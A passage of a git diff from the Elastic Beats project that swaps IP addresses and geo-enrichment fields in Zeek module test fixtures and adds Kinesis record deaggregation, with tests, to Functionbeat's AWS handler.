-        "event.original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}",
+        "event.original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"67.43.156.12\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}",
         "event.type": [
             "connection",
             "info",
@@ -88,24 +75,25 @@
         ],
         "fileset.name": "ntp",
         "input.type": "log",
-        "log.offset": 335,
-        "network.community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=",
+        "log.offset": 333,
+        "network.community_id": "1:muwkrDW4UPGLQ9iNHdBLBx3RwS8=",
         "network.direction": "external",
         "network.protocol": "ntp",
         "network.transport": "udp",
         "network.type": "ipv4",
         "related.ip": [
-            "130.118.205.62",
-            "208.79.89.249"
+            "208.79.89.249",
+            "67.43.156.12"
         ],
         "service.type": "zeek",
-        "source.address": "130.118.205.62",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "130.118.205.62",
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": 38461,
         "tags": [
             "zeek.ntp"
diff --git a/x-pack/filebeat/module/zeek/signature/test/signature-json.log b/x-pack/filebeat/module/zeek/signature/test/signature-json.log
index 4725117d90e6..068a71b6fb0e 100644
--- a/x-pack/filebeat/module/zeek/signature/test/signature-json.log
+++ b/x-pack/filebeat/module/zeek/signature/test/signature-json.log
@@ -1 +1 @@
-{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "124.51.137.154","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "124.51.137.154: TCP traffic","sub_msg": ""}
+{"ts": 1611852809.869245,"uid": "CbjAXE4CBxJ8W7VoJg","src_addr": "175.16.199.1","src_port": 51617,"dst_addr": "160.218.27.63","dst_port": 445,"note": "Signatures::Sensitive_Signature","sig_id": "my-second-sig","event_msg": "175.16.199.1: TCP traffic","sub_msg": ""}
diff --git a/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json b/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json
index 6951cedca700..a3e18134e612 100644
--- a/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/signature/test/signature-json.log-expected.json
@@ -2,42 +2,33 @@
     {
         "@timestamp": "2021-01-28T16:53:29.869Z",
         "destination.address": "160.218.27.63",
-        "destination.as.number": 5610,
-        "destination.as.organization.name": "O2 Czech Republic, a.s.",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CZ",
-        "destination.geo.country_name": "Czechia",
-        "destination.geo.location.lat": 50.0848,
-        "destination.geo.location.lon": 14.4112,
         "destination.ip": "160.218.27.63",
         "destination.port": 445,
         "event.dataset": "zeek.signature",
         "event.kind": "alert",
         "event.module": "zeek",
-        "event.original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"124.51.137.154\",\"src_port\": 51617,\"dst_addr\": \"160.218.27.63\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"124.51.137.154: TCP traffic\",\"sub_msg\": \"\"}",
+        "event.original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"175.16.199.1\",\"src_port\": 51617,\"dst_addr\": \"160.218.27.63\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"175.16.199.1: TCP traffic\",\"sub_msg\": \"\"}",
         "fileset.name": "signature",
         "input.type": "log",
         "log.offset": 0,
         "network.direction": "external",
         "related.ip": [
-            "124.51.137.154",
-            "160.218.27.63"
+            "160.218.27.63",
+            "175.16.199.1"
         ],
-        "rule.description": "124.51.137.154: TCP traffic",
+        "rule.description": "175.16.199.1: TCP traffic",
         "rule.id": "my-second-sig",
         "service.type": "zeek",
-        "source.address": "124.51.137.154",
-        "source.as.number": 17858,
-        "source.as.organization.name": "LG POWERCOMM",
-        "source.geo.city_name": "Busan",
+        "source.address": "175.16.199.1",
+        "source.geo.city_name": "Changchun",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "KR",
-        "source.geo.country_name": "South Korea",
-        "source.geo.location.lat": 35.1003,
-        "source.geo.location.lon": 129.0442,
-        "source.geo.region_iso_code": "KR-26",
-        "source.geo.region_name": "Busan",
-        "source.ip": "124.51.137.154",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.port": 51617,
         "tags": [
             "zeek.signature"
diff --git a/x-pack/filebeat/module/zeek/sip/test/sip-json.log b/x-pack/filebeat/module/zeek/sip/test/sip-json.log
index 0442b80670b4..12d956755b1d 100644
--- a/x-pack/filebeat/module/zeek/sip/test/sip-json.log
+++ b/x-pack/filebeat/module/zeek/sip/test/sip-json.log
@@ -1,3 +1,3 @@
 {"ts":1361916159.055464,"uid":"CPRLCB4eWHdjP852Bk","id.orig_h":"172.16.133.19","id.orig_p":5060,"id.resp_h":"74.63.41.218","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:newyork.voip.ms:5060","request_from":"\u0022AppNeta\u0022 <sip:116954_Boston6@newyork.voip.ms>","request_to":"<sip:116954_Boston6@newyork.voip.ms>","response_from":"\u0022AppNeta\u0022 <sip:116954_Boston6@newyork.voip.ms>","response_to":"<sip:116954_Boston6@newyork.voip.ms>;tag=as023f66a5","call_id":"8694cd7e-976e4fc3-d76f6e38@172.16.133.19","seq":"4127 REGISTER","request_path":["SIP/2.0/UDP 172.16.133.19:5060"],"response_path":["SIP/2.0/UDP 172.16.133.19:5060"],"user_agent":"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267","status_code":401,"status_msg":"Unauthorized","request_body_len":0,"response_body_len":0}
-{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"200.57.7.204","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"<sip:200.57.7.195:55061;user=phone>","request_to":"\u0022francisco@bestel.com\u0022 <sip:francisco@bestel.com:55060>","response_from":"<sip:200.57.7.195:55061;user=phone>","response_to":"\u0022francisco@bestel.com\u0022 <sip:francisco@bestel.com:55060>;tag=298852044","call_id":"12013223@200.57.7.195","seq":"1 INVITE","request_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"response_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061","SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0}
-{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"200.57.7.205","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan <sip:Ivan@Verso.com>","request_to":"Ivan <sip:Ivan@Verso.com>","response_from":"\u0022Ivan\u0022 <sip:Ivan@Verso.com>","response_to":"\u0022Ivan\u0022 <sip:Ivan@Verso.com>","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 200.57.7.205:5061;rport"],"response_path":["SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061"],"user_agent":"Verso Softphone release 1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0}
+{"ts":1105725482.965944,"uid":"ComJz236lSOcuOmix3","id.orig_h":"216.160.83.57","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"INVITE","uri":"sip:francisco@bestel.com:55060","request_from":"<sip:200.57.7.195:55061;user=phone>","request_to":"\u0022francisco@bestel.com\u0022 <sip:francisco@bestel.com:55060>","response_from":"<sip:200.57.7.195:55061;user=phone>","response_to":"\u0022francisco@bestel.com\u0022 <sip:francisco@bestel.com:55060>;tag=298852044","call_id":"12013223@200.57.7.195","seq":"1 INVITE","request_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"response_path":["SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061","SIP/2.0/UDP 200.57.7.195","SIP/2.0/UDP 200.57.7.195:55061"],"status_code":180,"status_msg":"Ringing","request_body_len":229,"response_body_len":0}
+{"ts":1105725487.022577,"uid":"CJZDWgixtwqXctWEg","id.orig_h":"67.43.156.12","id.orig_p":5061,"id.resp_h":"200.57.7.195","id.resp_p":5060,"trans_depth":0,"method":"REGISTER","uri":"sip:Verso.com","request_from":"Ivan <sip:Ivan@Verso.com>","request_to":"Ivan <sip:Ivan@Verso.com>","response_from":"\u0022Ivan\u0022 <sip:Ivan@Verso.com>","response_to":"\u0022Ivan\u0022 <sip:Ivan@Verso.com>","call_id":"46E1C3CB36304F84A020CF6DD3F96461@Verso.com","seq":"37764 REGISTER","request_path":["SIP/2.0/UDP 67.43.156.12:5061;rport"],"response_path":["SIP/2.0/UDP 67.43.156.12:5061;received=67.43.156.12;rport=5061"],"user_agent":"Verso Softphone release 1104w","status_code":200,"status_msg":"OK","request_body_len":0,"response_body_len":0}
diff --git a/x-pack/filebeat/module/zeek/sip/test/sip-json.log-expected.json b/x-pack/filebeat/module/zeek/sip/test/sip-json.log-expected.json
index 5352052b0cd8..ce78c412c513 100644
--- a/x-pack/filebeat/module/zeek/sip/test/sip-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/sip/test/sip-json.log-expected.json
@@ -2,13 +2,6 @@
     {
         "@timestamp": "2013-02-26T22:02:39.055Z",
         "destination.address": "74.63.41.218",
-        "destination.as.number": 29791,
-        "destination.as.organization.name": "Internap Corporation",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "74.63.41.218",
         "destination.port": 5060,
         "event.action": "REGISTER",
@@ -72,16 +65,6 @@
     {
         "@timestamp": "2005-01-14T17:58:02.965Z",
         "destination.address": "200.57.7.195",
-        "destination.as.number": 18734,
-        "destination.as.organization.name": "Operbes, S.A. de C.V.",
-        "destination.geo.city_name": "Mexico City",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "MX",
-        "destination.geo.country_name": "Mexico",
-        "destination.geo.location.lat": 19.4357,
-        "destination.geo.location.lon": -99.1438,
-        "destination.geo.region_iso_code": "MX-CMX",
-        "destination.geo.region_name": "Mexico City",
         "destination.ip": "200.57.7.195",
         "destination.port": 5060,
         "event.action": "INVITE",
@@ -100,27 +83,26 @@
         "fileset.name": "sip",
         "input.type": "log",
         "log.offset": 805,
-        "network.community_id": "1:U/Makwsc8lm6pVKLfRMzoNTI++0=",
+        "network.community_id": "1:jfUDdOppqfMcEoQi8CpFBcxqBwc=",
         "network.direction": "external",
         "network.protocol": "sip",
         "network.transport": "udp",
         "related.ip": [
             "200.57.7.195",
-            "200.57.7.204"
+            "216.160.83.57"
         ],
         "service.type": "zeek",
-        "source.address": "200.57.7.204",
-        "source.as.number": 18734,
-        "source.as.organization.name": "Operbes, S.A. de C.V.",
-        "source.geo.city_name": "Mexico City",
+        "source.address": "216.160.83.57",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
         "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "MX",
-        "source.geo.country_name": "Mexico",
-        "source.geo.location.lat": 19.4357,
-        "source.geo.location.lon": -99.1438,
-        "source.geo.region_iso_code": "MX-CMX",
-        "source.geo.region_name": "Mexico City",
-        "source.ip": "200.57.7.204",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "source.port": 5061,
         "tags": [
             "zeek.sip"
@@ -158,16 +140,6 @@
     {
         "@timestamp": "2005-01-14T17:58:07.022Z",
         "destination.address": "200.57.7.195",
-        "destination.as.number": 18734,
-        "destination.as.organization.name": "Operbes, S.A. de C.V.",
-        "destination.geo.city_name": "Mexico City",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "MX",
-        "destination.geo.country_name": "Mexico",
-        "destination.geo.location.lat": 19.4357,
-        "destination.geo.location.lon": -99.1438,
-        "destination.geo.region_iso_code": "MX-CMX",
-        "destination.geo.region_name": "Mexico City",
         "destination.ip": "200.57.7.195",
         "destination.port": 5060,
         "event.action": "REGISTER",
@@ -185,28 +157,24 @@
         ],
         "fileset.name": "sip",
         "input.type": "log",
-        "log.offset": 1654,
-        "network.community_id": "1:0hvHF/bh5wFKg7nfRXxsno4F198=",
+        "log.offset": 1655,
+        "network.community_id": "1:NaElKLXPJh/FxFEgOVrBVQq7ziE=",
         "network.direction": "external",
         "network.protocol": "sip",
         "network.transport": "udp",
         "related.ip": [
             "200.57.7.195",
-            "200.57.7.205"
+            "67.43.156.12"
         ],
         "service.type": "zeek",
-        "source.address": "200.57.7.205",
-        "source.as.number": 18734,
-        "source.as.organization.name": "Operbes, S.A. de C.V.",
-        "source.geo.city_name": "Mexico City",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "MX",
-        "source.geo.country_name": "Mexico",
-        "source.geo.location.lat": 19.4357,
-        "source.geo.location.lon": -99.1438,
-        "source.geo.region_iso_code": "MX-CMX",
-        "source.geo.region_name": "Mexico City",
-        "source.ip": "200.57.7.205",
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": 5061,
         "tags": [
             "zeek.sip"
@@ -219,13 +187,13 @@
         "zeek.sip.request.body_length": 0,
         "zeek.sip.request.from": "Ivan <sip:Ivan@Verso.com>",
         "zeek.sip.request.path": [
-            "SIP/2.0/UDP 200.57.7.205:5061;rport"
+            "SIP/2.0/UDP 67.43.156.12:5061;rport"
         ],
         "zeek.sip.request.to": "Ivan <sip:Ivan@Verso.com>",
         "zeek.sip.response.body_length": 0,
         "zeek.sip.response.from": "\"Ivan\" <sip:Ivan@Verso.com>",
         "zeek.sip.response.path": [
-            "SIP/2.0/UDP 200.57.7.205:5061;received=200.57.7.205;rport=5061"
+            "SIP/2.0/UDP 67.43.156.12:5061;received=67.43.156.12;rport=5061"
         ],
         "zeek.sip.response.to": "\"Ivan\" <sip:Ivan@Verso.com>",
         "zeek.sip.sequence.method": "REGISTER",
diff --git a/x-pack/filebeat/module/zeek/ssl/test/ssl-json.log-expected.json b/x-pack/filebeat/module/zeek/ssl/test/ssl-json.log-expected.json
index d7c6816aa069..048a32642c0c 100644
--- a/x-pack/filebeat/module/zeek/ssl/test/ssl-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/ssl/test/ssl-json.log-expected.json
@@ -3,16 +3,6 @@
         "@timestamp": "2019-01-17T01:32:16.805Z",
         "client.address": "10.178.98.102",
         "destination.address": "35.199.178.4",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.4043,
-        "destination.geo.location.lon": -122.0748,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "35.199.178.4",
         "destination.port": 9243,
         "event.category": [
@@ -86,16 +76,6 @@
         "@timestamp": "2019-01-17T01:32:16.805Z",
         "client.address": "10.178.98.102",
         "destination.address": "35.199.178.4",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.4043,
-        "destination.geo.location.lon": -122.0748,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "35.199.178.4",
         "destination.port": 9243,
         "event.category": [
diff --git a/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log b/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log
index b3595d55a6bd..ba22a03e9bcd 100644
--- a/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log
+++ b/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log
@@ -1 +1 @@
-{"ts":1361916158.650605,"src":"192.168.1.1","dst":"8.8.8.8","proto":"udp"}
+{"ts":1361916158.650605,"src":"192.168.1.1","dst":"175.16.199.1","proto":"udp"}
diff --git a/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log-expected.json b/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log-expected.json
index 89e3ebcbe095..fc254db12d04 100644
--- a/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/traceroute/test/traceroute-json.log-expected.json
@@ -1,15 +1,16 @@
 [
     {
         "@timestamp": "2013-02-26T22:02:38.650Z",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.address": "175.16.199.1",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "event.category": [
             "network"
         ],
@@ -25,8 +26,8 @@
         "network.direction": "outbound",
         "network.transport": "udp",
         "related.ip": [
-            "192.168.1.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.1.1"
         ],
         "service.type": "zeek",
         "source.address": "192.168.1.1",
diff --git a/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log b/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log
index 139a6591c755..16768851dd03 100644
--- a/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log
+++ b/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log
@@ -1 +1 @@
-{"ts":1544405666.743509,"id.orig_h":"132.16.146.79","id.orig_p":0,"id.resp_h":"132.16.110.133","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"}
+{"ts":1544405666.743509,"id.orig_h":"89.160.20.112","id.orig_p":0,"id.resp_h":"132.16.110.133","id.resp_p":8080,"tunnel_type":"Tunnel::HTTP","action":"Tunnel::DISCOVER"}
diff --git a/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log-expected.json b/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log-expected.json
index 9138243618c3..2f512e4637b9 100644
--- a/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log-expected.json
+++ b/x-pack/filebeat/module/zeek/tunnel/test/tunnel-json.log-expected.json
@@ -2,13 +2,8 @@
     {
         "@timestamp": "2018-12-10T01:34:26.743Z",
         "destination.address": "132.16.110.133",
-        "destination.as.number": 427,
-        "destination.as.organization.name": "Air Force Systems Networking",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
+        "destination.as.number": 721,
+        "destination.as.organization.name": "DoD Network Information Center",
         "destination.ip": "132.16.110.133",
         "destination.port": 8080,
         "event.action": "Tunnel::DISCOVER",
@@ -27,18 +22,21 @@
         "network.direction": "external",
         "related.ip": [
             "132.16.110.133",
-            "132.16.146.79"
+            "89.160.20.112"
         ],
         "service.type": "zeek",
-        "source.address": "132.16.146.79",
-        "source.as.number": 427,
-        "source.as.organization.name": "Air Force Systems Networking",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "132.16.146.79",
+        "source.address": "89.160.20.112",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.port": 0,
         "tags": [
             "zeek.tunnel"
diff --git a/x-pack/functionbeat/provider/aws/aws/kinesis.go b/x-pack/functionbeat/provider/aws/aws/kinesis.go
index 86d1d92959a0..2cdc02d075e7 100644
--- a/x-pack/functionbeat/provider/aws/aws/kinesis.go
+++ b/x-pack/functionbeat/provider/aws/aws/kinesis.go
@@ -146,9 +146,12 @@ func (k *Kinesis) createHandler(client core.Client) func(request events.KinesisE
 	return func(request events.KinesisEvent) error {
 		k.log.Debugf("The handler receives %d events", len(request.Records))
 
-		events := transformer.KinesisEvent(request)
+		events, err := transformer.KinesisEvent(request)
+		if err != nil {
+			return err
+		}
 
-		if err := client.PublishAll(events); err != nil {
+		if err = client.PublishAll(events); err != nil {
 			k.log.Errorf("Could not publish events to the pipeline, error: %+v", err)
 			return err
 		}
diff --git a/x-pack/functionbeat/provider/aws/aws/kinesis_test.go b/x-pack/functionbeat/provider/aws/aws/kinesis_test.go
index 762cce1006df..d99e3640071d 100644
--- a/x-pack/functionbeat/provider/aws/aws/kinesis_test.go
+++ b/x-pack/functionbeat/provider/aws/aws/kinesis_test.go
@@ -5,11 +5,16 @@
 package aws
 
 import (
+	"crypto/md5"
 	"errors"
 	"fmt"
+	"strconv"
 	"testing"
 
 	"github.com/aws/aws-lambda-go/events"
+	"github.com/awslabs/kinesis-aggregation/go/deaggregator"
+	aggRecProto "github.com/awslabs/kinesis-aggregation/go/records"
+	"github.com/golang/protobuf/proto"
 	"github.com/stretchr/testify/assert"
 
 	"github.com/elastic/beats/v7/libbeat/common"
@@ -39,6 +44,19 @@ func TestKinesis(t *testing.T) {
 		assert.NoError(t, err)
 	})
 
+	t.Run("when publish with agg is successful", func(t *testing.T) {
+		client := &arrayBackedClient{}
+		k, err := NewKinesis(&provider.DefaultProvider{}, cfg)
+		if !assert.NoError(t, err) {
+			return
+		}
+
+		c, _ := k.(*Kinesis)
+		handler := c.createHandler(client)
+		err = handler(generateAggregatedKinesisEvent(true))
+		assert.NoError(t, err)
+	})
+
 	t.Run("when publish is not successful", func(t *testing.T) {
 		e := errors.New("something bad")
 		client := &arrayBackedClient{err: e}
@@ -54,6 +72,19 @@ func TestKinesis(t *testing.T) {
 		assert.Equal(t, e, err)
 	})
 
+	t.Run("when publish with agg is not successful", func(t *testing.T) {
+		client := &arrayBackedClient{}
+		k, err := NewKinesis(&provider.DefaultProvider{}, cfg)
+		if !assert.NoError(t, err) {
+			return
+		}
+
+		c, _ := k.(*Kinesis)
+		handler := c.createHandler(client)
+		err = handler(generateAggregatedKinesisEvent(false))
+		assert.Error(t, err)
+	})
+
 	t.Run("test config validation", testKinesisConfig)
 	t.Run("test starting position", testStartingPosition)
 }
@@ -78,6 +109,54 @@ func generateKinesisEvent() events.KinesisEvent {
 	}
 }
 
+func generateAggregatedKinesisEvent(validRec bool) events.KinesisEvent {
+	// Heavily based on https://github.com/awslabs/kinesis-aggregation/blob/master/go/deaggregator/deaggregator_test.go
+	aggRec := &aggRecProto.AggregatedRecord{}
+	unquotedHeader, err := strconv.Unquote(deaggregator.KplMagicHeader)
+	if err != nil {
+		panic(err)
+	}
+	aggRecBytes := []byte(unquotedHeader)
+	partKeyTable := make([]string, 0)
+	partKey := uint64(0)
+	hashKey := uint64(0)
+	r := &aggRecProto.Record{
+		ExplicitHashKeyIndex: &hashKey,
+		Data:                 []byte("hello world"),
+		Tags:                 make([]*aggRecProto.Tag, 0),
+	}
+	// This seems to be the only way to trigger the deaggregation module to return an error when needed
+	if validRec {
+		r.PartitionKeyIndex = &partKey
+	}
+	aggRec.Records = append(aggRec.Records, r)
+	partKeyTable = append(partKeyTable, "0")
+
+	aggRec.PartitionKeyTable = partKeyTable
+	data, _ := proto.Marshal(aggRec)
+	md5Hash := md5.Sum(data)
+	aggRecBytes = append(aggRecBytes, data...)
+	aggRecBytes = append(aggRecBytes, md5Hash[:]...)
+
+	return events.KinesisEvent{
+		Records: []events.KinesisEventRecord{
+			events.KinesisEventRecord{
+				AwsRegion:      "east-1",
+				EventID:        "1234",
+				EventName:      "connect",
+				EventSource:    "web",
+				EventSourceArn: "arn:aws:iam::00000000:role/functionbeat",
+				Kinesis: events.KinesisRecord{
+					Data:                 aggRecBytes,
+					PartitionKey:         "abc123",
+					SequenceNumber:       "12345",
+					KinesisSchemaVersion: "v1",
+				},
+			},
+		},
+	}
+}
+
 func testKinesisConfig(t *testing.T) {
 	tests := map[string]struct {
 		valid     bool
diff --git a/x-pack/functionbeat/provider/aws/aws/transformer/transformer.go b/x-pack/functionbeat/provider/aws/aws/transformer/transformer.go
index bc38ed2ab2df..b77dafcc24e4 100644
--- a/x-pack/functionbeat/provider/aws/aws/transformer/transformer.go
+++ b/x-pack/functionbeat/provider/aws/aws/transformer/transformer.go
@@ -13,6 +13,8 @@ import (
 	"time"
 
 	"github.com/aws/aws-lambda-go/events"
+	"github.com/aws/aws-sdk-go/service/kinesis"
+	"github.com/awslabs/kinesis-aggregation/go/deaggregator"
 
 	"github.com/elastic/beats/v7/libbeat/beat"
 	"github.com/elastic/beats/v7/libbeat/common"
@@ -83,34 +85,48 @@ func APIGatewayProxyRequest(request events.APIGatewayProxyRequest) beat.Event {
 
 // KinesisEvent takes a kinesis event and create multiples beat events.
 // DOCS: https://docs.aws.amazon.com/lambda/latest/dg/with-kinesis.html
-func KinesisEvent(request events.KinesisEvent) []beat.Event {
-	events := make([]beat.Event, len(request.Records))
-	for idx, record := range request.Records {
-		events[idx] = beat.Event{
-			Timestamp: time.Now(),
-			Fields: common.MapStr{
-				"event": common.MapStr{
-					"kind": "event",
-				},
-				"cloud": common.MapStr{
-					"provider": "aws",
-					"region":   record.AwsRegion,
+func KinesisEvent(request events.KinesisEvent) ([]beat.Event, error) {
+	var events []beat.Event
+	for _, record := range request.Records {
+		kr := &kinesis.Record{
+			ApproximateArrivalTimestamp: &record.Kinesis.ApproximateArrivalTimestamp.Time,
+			Data:                        record.Kinesis.Data,
+			EncryptionType:              &record.Kinesis.EncryptionType,
+			PartitionKey:                &record.Kinesis.PartitionKey,
+			SequenceNumber:              &record.Kinesis.SequenceNumber,
+		}
+		deaggRecords, err := deaggregator.DeaggregateRecords([]*kinesis.Record{kr})
+		if err != nil {
+			return nil, err
+		}
+
+		for _, deaggRecord := range deaggRecords {
+			events = append(events, beat.Event{
+				Timestamp: time.Now(),
+				Fields: common.MapStr{
+					"event": common.MapStr{
+						"kind": "event",
+					},
+					"cloud": common.MapStr{
+						"provider": "aws",
+						"region":   record.AwsRegion,
+					},
+					"event_id":                record.EventID,
+					"event_name":              record.EventName,
+					"event_source":            record.EventSource,
+					"event_source_arn":        record.EventSourceArn,
+					"event_version":           record.EventVersion,
+					"aws_region":              record.AwsRegion,
+					"message":                 string(deaggRecord.Data),
+					"kinesis_partition_key":   *deaggRecord.PartitionKey,
+					"kinesis_schema_version":  record.Kinesis.KinesisSchemaVersion,
